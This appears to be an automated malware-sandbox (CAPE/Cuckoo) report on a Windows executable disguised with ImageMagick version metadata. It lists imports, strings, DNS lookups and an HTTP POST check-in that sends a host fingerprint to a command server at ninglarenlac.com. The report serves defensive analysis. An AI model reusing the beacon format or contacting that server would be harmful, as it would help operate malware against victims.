0x40e0d0 GetModuleHandleW
0x40e0d4 SetLastError
0x40e0d8 GetCurrentThreadId
0x40e0dc GetProcAddress
0x40e0e0 HeapCreate
0x40e0e4 ExitProcess
0x40e0e8 WriteFile
0x40e0ec GetStdHandle
0x40e0f0 GetModuleFileNameW
0x40e0f4 SetHandleCount
0x40e0fc GetFileType
0x40e100 GetStartupInfoW
0x40e104 Sleep
0x40e108 GetConsoleCP
0x40e10c GetConsoleMode
0x40e110 CreateMutexA
0x40e114 FlushFileBuffers
0x40e118 RtlUnwind
0x40e11c LCMapStringW
0x40e120 MultiByteToWideChar
0x40e124 RaiseException
0x40e134 VirtualProtect
0x40e138 GetTickCount
0x40e13c GetCurrentProcessId
0x40e144 GetStringTypeW
0x40e148 SetFilePointer
0x40e14c LoadLibraryW
0x40e150 HeapReAlloc
0x40e154 WriteConsoleW
0x40e158 SetStdHandle
0x40e15c ReadFile
0x40e160 HeapSize

.text
`.rdata
@.data
.rsrc
WNetGetUniversalNameA
MPR.dll
GetVolumeNameForVolumeMountPointA
CreateFileA
FindVolumeClose
GetDriveTypeW
SetErrorMode
QueryDosDeviceA
WaitForSingleObject
SetEvent
ReadDirectoryChangesW
FindNextVolumeMountPointA
InitializeCriticalSection
WideCharToMultiByte
GetVolumeInformationA
LeaveCriticalSection
GetFileAttributesA
GetOverlappedResult
GetLastError
FindVolumeMountPointClose
EnterCriticalSection
CreateEventW
WaitForMultipleObjects
GetVolumePathNamesForVolumeNameA
FindFirstVolumeMountPointA
DeleteCriticalSection
FindFirstVolumeA
CloseHandle
FindNextVolumeA
CreateThread
HeapFree
HeapAlloc
GetCommandLineA
GetCommandLineW
HeapSetInformation
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetCPInfo
InterlockedIncrement
InterlockedDecrement
GetACP
GetOEMCP
IsValidCodePage
EncodePointer
TlsAlloc
TlsGetValue
TlsSetValue
DecodePointer
TlsFree
GetModuleHandleW
SetLastError
GetCurrentThreadId
GetProcAddress
HeapCreate
ExitProcess
WriteFile
GetStdHandle
GetModuleFileNameW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
GetStartupInfoW
Sleep
GetConsoleCP
GetConsoleMode
CreateMutexA
FlushFileBuffers
RtlUnwind
LCMapStringW
MultiByteToWideChar
RaiseException
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
VirtualProtect
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetStringTypeW
SetFilePointer
LoadLibraryW
HeapReAlloc
WriteConsoleW
SetStdHandle
ReadFile
HeapSize
IsProcessorFeaturePresent
CreateFileW
KERNEL32.dll
IDR_MAGICKICON
VS_VERSION_INFO
StringFileInfo
040904b0
ProductName
ImageMagick
FileDescription
ImageMagick Studio library and utility programs
OriginalFilename
ImageMagick
InternalName
ImageMagick
FileVersion
6.7.9
ProductVersion
6.7.9
CompanyName
ImageMagick Studio
LegalCopyright
Copyright (C) 1999-2012 ImageMagick Studio LLC
Comments
ImageMagick 6.7.9-7 2012-09-21 Q16 http://www.imagemagick.org
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


werd.exe, PID: 2972, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\werd.exe
Command Line: "C:\Users\user\AppData\Local\Temp\werd.exe"

Hosts

Direct IP Country Name
Y 8.8.8.8 [VT] United States
N 23.21.121.219 [VT] United States
N 191.101.20.16 [VT] Netherlands

TCP

Source Source Port Destination Destination Port
192.168.35.21 49164 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49165 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49166 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49167 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49168 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49169 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49170 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49171 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49172 191.101.20.16 ninglarenlac.com 80
192.168.35.21 49163 23.21.121.219 api.ipify.org 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
api.ipify.org [VT] A 23.21.121.219 [VT]
CNAME nagano-19599.herokussl.com [VT]
A 50.16.248.221 [VT]
A 50.19.229.252 [VT]
A 54.221.234.215 [VT]
A 23.23.114.123 [VT]
A 54.243.123.39 [VT]
CNAME elb097307-934924932.us-east-1.elb.amazonaws.com [VT]
ninglarenlac.com [VT] A 191.101.20.16 [VT]

HTTP Requests

URI Data
http://api.ipify.org/
GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

http://ninglarenlac.com/4/forum.php
POST /4/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: ninglarenlac.com
Content-Length: 118
Cache-Control: no-cache

GUID=11855836160270601216&BUILD=03gre12&INFO=WIN7-X64-CUCKOO @ WIN7-X64-CUCKOO\user&IP=5.62.62.203&TYPE=1&WIN=6.1(x64)

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

Sorry! No dropped files.
Sorry! No CAPE files.
Sorry! No process dumps.

Processing ( 1.598 seconds )

  • 0.896 Static
  • 0.158 CAPE
  • 0.146 BehaviorAnalysis
  • 0.144 TargetInfo
  • 0.139 TrID
  • 0.048 Deduplicate
  • 0.044 NetworkAnalysis
  • 0.01 Strings
  • 0.007 AnalysisInfo
  • 0.004 config_decoder
  • 0.002 Debug

Signatures ( 0.167 seconds )

  • 0.016 antiav_detectreg
  • 0.007 stealth_timeout
  • 0.007 infostealer_ftp
  • 0.007 ransomware_files
  • 0.006 persistence_autorun
  • 0.006 antiav_detectfile
  • 0.006 ransomware_extensions
  • 0.005 api_spamming
  • 0.005 decoy_document
  • 0.004 infostealer_bitcoin
  • 0.004 infostealer_im
  • 0.003 injection_createremotethread
  • 0.003 antivm_generic_disk
  • 0.003 vawtrak_behavior
  • 0.003 antianalysis_detectfile
  • 0.003 antianalysis_detectreg
  • 0.003 modify_proxy
  • 0.003 browser_security
  • 0.003 disables_browser_warn
  • 0.003 infostealer_mail
  • 0.002 tinba_behavior
  • 0.002 InjectionInterProcess
  • 0.002 bootkit
  • 0.002 rat_nanocore
  • 0.002 Doppelganging
  • 0.002 stealth_file
  • 0.002 mimics_filetime
  • 0.002 antivm_vbox_libs
  • 0.002 InjectionCreateRemoteThread
  • 0.002 reads_self
  • 0.002 cerber_behavior
  • 0.002 virus
  • 0.002 hancitor_behavior
  • 0.002 antivm_vbox_files
  • 0.002 antivm_vbox_keys
  • 0.002 geodo_banking_trojan
  • 0.002 network_torgateway
  • 0.001 lsass_credential_dumping
  • 0.001 malicious_dynamic_function_loading
  • 0.001 dyre_behavior
  • 0.001 antiav_avast_libs
  • 0.001 exploit_getbasekerneladdress
  • 0.001 network_anomaly
  • 0.001 antiemu_wine_func
  • 0.001 injection_explorer
  • 0.001 betabot_behavior
  • 0.001 kazybot_behavior
  • 0.001 exploit_gethaldispatchtable
  • 0.001 InjectionProcessHollowing
  • 0.001 kibex_behavior
  • 0.001 shifu_behavior
  • 0.001 exec_crash
  • 0.001 infostealer_browser_password
  • 0.001 ursnif_behavior
  • 0.001 dynamic_function_loading
  • 0.001 injection_runpe
  • 0.001 kovter_behavior
  • 0.001 process_needed
  • 0.001 antivm_parallels_keys
  • 0.001 antivm_vmware_keys
  • 0.001 antivm_xen_keys
  • 0.001 banker_zeus_mutex
  • 0.001 bot_drive
  • 0.001 bot_drive2
  • 0.001 browser_addon
  • 0.001 disables_system_restore
  • 0.001 modify_security_center_warnings
  • 0.001 modify_uac_prompt
  • 0.001 recon_fingerprint
  • 0.001 stealth_hiddenreg

Reporting ( 0.029 seconds )

  • 0.028 SubmitCAPE
  • 0.001 CompressResults
Task ID 25398
Mongo ID 5c06bbbcf284886b7cb819b5
Cuckoo release 1.3-CAPE